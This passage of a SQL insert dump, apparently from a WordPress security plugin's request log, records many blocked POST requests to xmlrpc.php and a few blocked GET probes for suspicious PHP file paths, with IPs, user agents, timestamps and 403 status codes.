Safari\\/537.36\"}','r0Vx3HgyGXq9BOdmZ4tLo2FN',0,1681393346.8026,567,'','POST',403,0,515,0,1,'',0),('47.242.255.46',804454190,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','gQSvUEmOcbayJj8qMkfBnWNz',0,1681393353.4341,604,'','POST',403,0,515,0,1,'',0),('52.2.164.245',872588533,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','8X3rmLb6091FKBWQqJsgwUhl',0,1681393358.6796,607,'','POST',403,0,515,0,1,'',0),('178.18.252.235',2987588843,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','CQaNqEe9O6wItZPBM5r10Kbo',0,1681393370.4853,622,'','POST',403,0,515,0,1,'',0),('31.220.74.65',534530625,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','auPMJ4Wn5KSFDRxI1LOVyCQe',0,1681393637.8981,4158,'','POST',403,0,515,0,1,'',0),('74.208.167.173',1255188397,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','g7M6jnwiKEkzAOGfl4QHWoNp',0,1681393640.8954,1644,'','POST',403,0,515,0,1,'',0),('47.242.33.63',804397375,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','2fuG5mpgjYADawqW8BkHL0K9',0,1681393659.2023,1137,'','POST',403,0,515,0,1,'',0),('194.149.144.86',3264581718,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','WwTySQ0gsCBvnjI4OAeiLN7P',0,1681393659.7495,930,'','POST',403,0,515,0,1,'',0),('136.243.5.53',2297627957,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','Lgb1BkDlGvzpnmdTQqEJFViP',0,1681393666.4297,646,'','POST',403,0,515,0,1,'',0),('143.42.144.21',2401931285,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','ByGZ3biqhJD2ofurvgO8cskP',0,1681393674.1543,597,'','POST',403,0,515,0,1,'',0),('65.109.137.42',1097697578,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','viE5NPXnlWJzp2CtqsxbLBGZ',0,1681393761.2199,576,'','POST',403,0,515,0,1,'',0),('192.64.117.87',3225449815,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','PaCvsgkfNDhmqI2MKiLxH1dV',0,1681394220.1249,690,'','POST',403,0,515,0,1,'',0),('51.178.95.118',867327862,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','t2T5FrklgaJBVx4y9foZMIbi',0,1681394226.1111,552,'','POST',403,0,515,0,1,'',0),('68.178.224.245',1152573685,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','u3J1olMOIDLEPpTnasNCFy9g',0,1681394229.2161,620,'','POST',403,0,515,0,1,'',0),('104.131.97.141',1753440653,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','crJQmX94bxsZHNfl0V7STq6F',0,1681394240.3491,614,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','VfBNLkoMpa1h0tIDzO4F68vw',0,1681394242.7653,601,'','POST',403,0,515,0,1,'',0),('34.79.92.113',575626353,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','vlw73CLXps4gKmSYUxZjDQNA',0,1681394250.7926,654,'','POST',403,0,515,0,1,'',0),('66.94.107.15',1113484047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','fLmuBYUXj90vkIpF4ygsOMPr',0,1681394254.5808,617,'','POST',403,0,515,0,1,'',0),('51.254.221.76',872340812,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','vjV3GXp6TzM58OnmNCybfBhI',0,1681394636.3337,574,'','POST',403,0,515,0,1,'',0),('162.240.222.21',2733694485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','DGhWQAlYZEKJ1CdgmTqptk8M',0,1681394642.7162,669,'','POST',403,0,515,0,1,'',0),('192.241.166.226',3237062370,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','9Jd4LyQ7kVnvWu5UXst0216P',0,1681394647.2964,598,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','D1ykrlUAx07IbphC4RHG3Z8K',0,1681394650.0022,872,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','QjmzNOHF1XxbLswaGWut92Dy',0,1681394650.6671,924,'','POST',403,0,515,0,1,'',0),('72.167.87.12',1218926348,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','s2KBzExmra31u7V0iJGhvTpR',0,1681394660.7419,616,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','uvYJFE2sn0xLA5yeiHtNZjS3',0,1681394661.9495,621,'','POST',403,0,515,0,1,'',0),('3.34.224.66',52617282,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','5QwKvRI4EfFzT72SBLemZJPX',0,1681394663.9346,555,'','POST',403,0,515,0,1,'',0),('68.178.145.141',1152553357,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','Eb2Cog7OaQy9iJ8BTnwZrfPv',0,1681394780.9136,1014,'','POST',403,0,515,0,1,'',0),('157.90.169.39',2639964455,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','sDGyRVoq8ghkQCAwrFTH9BuP',0,1681397235.8421,1979,'','POST',403,0,515,0,1,'',0),('173.214.170.82',2916526674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','jc6tFd3aApXYuwDLlVMo5g9E',0,1681397233.9536,4708,'','POST',403,0,515,0,1,'',0),('52.139.225.218',881582554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','JvLS3r5O2ZhVuBWC7U6DfxMp',0,1681397239.4651,643,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','RxfdegtYnUEQGq7ocM983wsi',0,1681397242.4592,644,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','X1hMLml0kBDusQ7V4tIyZnSq',0,1681397243.2783,629,'','POST',403,0,515,0,1,'',0),('69.16.227.57',1158734649,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','s48DUZREh5OMXYBi0tp6nPG2',0,1681397251.1154,655,'','POST',403,0,515,0,1,'',0),('34.205.43.62',583871294,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','3EO4R6Bni5CkqbNPfYxJWF2Z',0,1681397256.5641,713,'','POST',403,0,515,0,1,'',0),('68.183.179.155',1152889755,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','iaVJmXd4B9FqNfKZ756lPho8',0,1681397269.2513,667,'','POST',403,0,515,0,1,'',0),('82.165.84.66',1386566722,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','no6V5JlYvjhFfZ7RDdINBOsW',0,1681397289.5657,1304,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','65ASLk9iOnrdw4PsfZGeTjCB',0,1681397290.0738,1263,'','POST',403,0,515,0,1,'',0),('204.93.163.26',3428688666,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','HJqr1jumEansolyTC0tYgwMR',0,1681397295.0872,881,'','POST',403,0,515,0,1,'',0),('163.44.198.57',2737620537,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','kpX3fIVqiT9ljMstCaz4UBWn',0,1681402590.9364,4767,'','POST',403,0,515,0,1,'',0),('116.202.233.238',1959455214,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','JOHnkzbQcq6s7vKf2GygDPxI',0,1681402595.3979,769,'','POST',403,0,515,0,1,'',0),('68.178.224.4',1152573444,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','0WPNv8YQKyGdM3kxfj7zImXc',0,1681402598.8690,660,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','AWjabwx9i3hQLOFf4VeK0cGr',0,1681402606.1463,581,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','yzND5pXmugcUrlJ2nGYx91CI',0,1681402608.4097,603,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','OMfgNKzlDHa5ud8xSYkvVXiF',0,1681402612.6485,607,'','POST',403,0,515,0,1,'',0),('95.0.0.250',1593835770,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','hTudL9Se8WZA1glUXvGCNbjo',0,1681402616.8418,605,'','POST',403,0,515,0,1,'',0),('159.65.152.207',2671876303,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','DhpmT0Fq4XN6viaIKSdZ51OC',0,1681402622.6675,1390,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','ErZuz80JF1LX5KD2lxUmvbhy',0,1681402622.9871,1595,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','4Buge6qwzKQDGSJ9MobHai1n',0,1681402624.0695,977,'','POST',403,0,515,0,1,'',0),('74.208.160.149',1255186581,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','C6Dw7t59E0qTyIekKiNgYluL',0,1681402636.3793,586,'','POST',403,0,515,0,1,'',0),('159.65.152.207',2671876303,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','cHrVBa0RSFv3my8LsQCJgPzU',0,1681405349.2731,2304,'','POST',403,0,515,0,1,'',0),('46.105.97.186',778658234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','RPJh7bcxZQG3ATMVfvtz2UiY',0,1681405349.2731,2378,'','POST',403,0,515,0,1,'',0),('192.241.166.226',3237062370,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','nUxrQtTzELehvydlPiuJCYIG',0,1681405347.8840,4270,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','eWOb7gf3lwYvxEQCky5MiAsq',0,1681405354.9365,592,'','POST',403,0,515,0,1,'',0),('180.235.151.165',3035338661,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pxBC637DvWzfjHonQNYuOJrm',0,1681405359.2619,581,'','POST',403,0,515,0,1,'',0),('180.235.151.165',3035338661,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','oktNWJKl8ULQMvdczYxh34DA',0,1681405372.2932,556,'','POST',403,0,515,0,1,'',0),('173.214.170.82',2916526674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','uc9LkORHNMfE6XtyZhamoevd',0,1681405374.5049,573,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','6FoZMdlIROLxNwm9tWYh25Xu',0,1681405379.2482,1996,'','POST',403,0,515,0,1,'',0),('159.223.93.124',2682215804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','YWkXKCetGNnmBiL7SsV39olb',0,1681405379.6497,2024,'','POST',403,0,515,0,1,'',0),('3.34.224.66',52617282,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','qiMyVmOxcI7XgErWP3buJpBe',0,1681405380.0607,1749,'','POST',403,0,515,0,1,'',0),('185.200.116.219',3116922075,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xX3bNIr89zy5eZf6hvL4opOQ',0,1681409316.9321,3829,'','POST',403,0,515,0,1,'',0),('82.102.28.107',1382423659,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','t48wkzVU05IZoY3nNvEMilKD',0,1681410069.0629,1495,'','POST',403,0,515,0,1,'',0),('146.70.61.139',2454076811,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','w8ltR4PgjsKiOMDhGVvUYAFS',0,1681411087.7702,6632,'','POST',403,0,515,0,1,'',0),('185.200.116.131',3116921987,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','m8Hq7NtxzJkQOl4cDRFKbL9o',0,1681412921.3461,723,'','POST',403,0,515,0,1,'',0),('159.65.152.207',2671876303,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','3Sx08NfsIpuyW9FTChdbVKGk',0,1681413275.5717,601,'','POST',403,0,515,0,1,'',0),('173.214.170.82',2916526674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','68db5Pk2CcsqUyfonj0agm4x',0,1681413277.1364,545,'','POST',403,0,515,0,1,'',0),('87.106.229.164',1466623396,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','HDVd8A24Ps7EpUxQfj6ryz1u',0,1681413286.6705,1300,'','POST',403,0,515,0,1,'',0),('213.32.106.122',3575671418,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','rmRKXWvkszwICYH9NZt3jxco',0,1681413286.9477,1171,'','POST',403,0,515,0,1,'',0),('184.168.98.120',3098043000,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Fh8WGpr7U9dygBfVeL1Y34x2',0,1681413294.3310,1330,'','POST',403,0,515,0,1,'',0),('159.223.60.241',2682207473,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','1KpkqYel4xuZhEbc8Lovz90J',0,1681413296.1813,572,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','5AYVZoQ1DUhTMJne9jIks8vP',0,1681413309.9235,600,'','POST',403,0,515,0,1,'',0),('65.20.75.229',1091849189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','tndu9eQfZlyN0W3gaImVFT2H',0,1681413315.6008,588,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','d1EBFc0qVLG3DiSpoh649mJW',0,1681413316.9658,616,'','POST',403,0,515,0,1,'',0),('161.97.86.172',2707510956,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','1Z0KINX6xeVT89swGnhQdfqz',0,1681413328.7311,627,'','POST',403,0,515,0,1,'',0),('156.224.21.75',2631931211,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','Yz9b0JxP2USRcLdAW7EOgNQl',0,1681413331.2810,558,'','POST',403,0,515,0,1,'',0),('51.254.213.67',872338755,'','http://cmdev-site1.com/wp-content/themes/seotheme/auto_seo.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"cmdev-site1.com\"}','XitlRpm0wEnv7oUPMrgqZIkJ',0,1681415021.9083,1576,'','GET',403,0,700,0,1,'',0),('51.254.213.67',872338755,'','http://cmdev-site1.com/wp-admin/auto_seo.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"cmdev-site1.com\"}','iJEvc2Pmf4Q6bNLnt9ekGjwa',0,1681415107.2633,502,'','GET',403,0,700,0,1,'',0),('51.254.213.67',872338755,'','http://cmdev-site1.com/inputs.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"cmdev-site1.com\"}','Z7cEgmyVDFrUXwzO5S3xKajd',0,1681415121.8093,294,'','GET',403,0,700,0,1,'',0),('51.254.213.67',872338755,'','http://cmdev-site1.com/wp-content/auto_seo.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"cmdev-site1.com\"}','EsbTn8HJN24zLBd3pF0roPek',0,1681415169.8809,272,'','GET',403,0,700,0,1,'',0),('51.254.213.67',872338755,'','http://cmdev-site1.com/auto_seo.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"cmdev-site1.com\"}','SLsTnpYWBeqyZ2IfPkCoXcxU',0,1681415182.6734,278,'','GET',403,0,700,0,1,'',0),('202.148.152.19',3398735891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','Zmxp9CJv8geUK5tMFwD4qydR',0,1681419373.4206,577,'','POST',403,0,515,0,1,'',0),('202.172.28.70',3400277062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','xPL0nyRd8a5uVfpTJ1DlUBHN',0,1681419374.9549,599,'','POST',403,0,515,0,1,'',0),('173.214.170.82',2916526674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','ozb0HQTjrXLda237UDK5kNWw',0,1681419381.4179,561,'','POST',403,0,515,0,1,'',0),('173.214.170.82',2916526674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','8NZ9FIQEkD65mxSXjUuMYKgq',0,1681419393.4903,612,'','POST',403,0,515,0,1,'',0),('176.52.242.6',2956259846,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 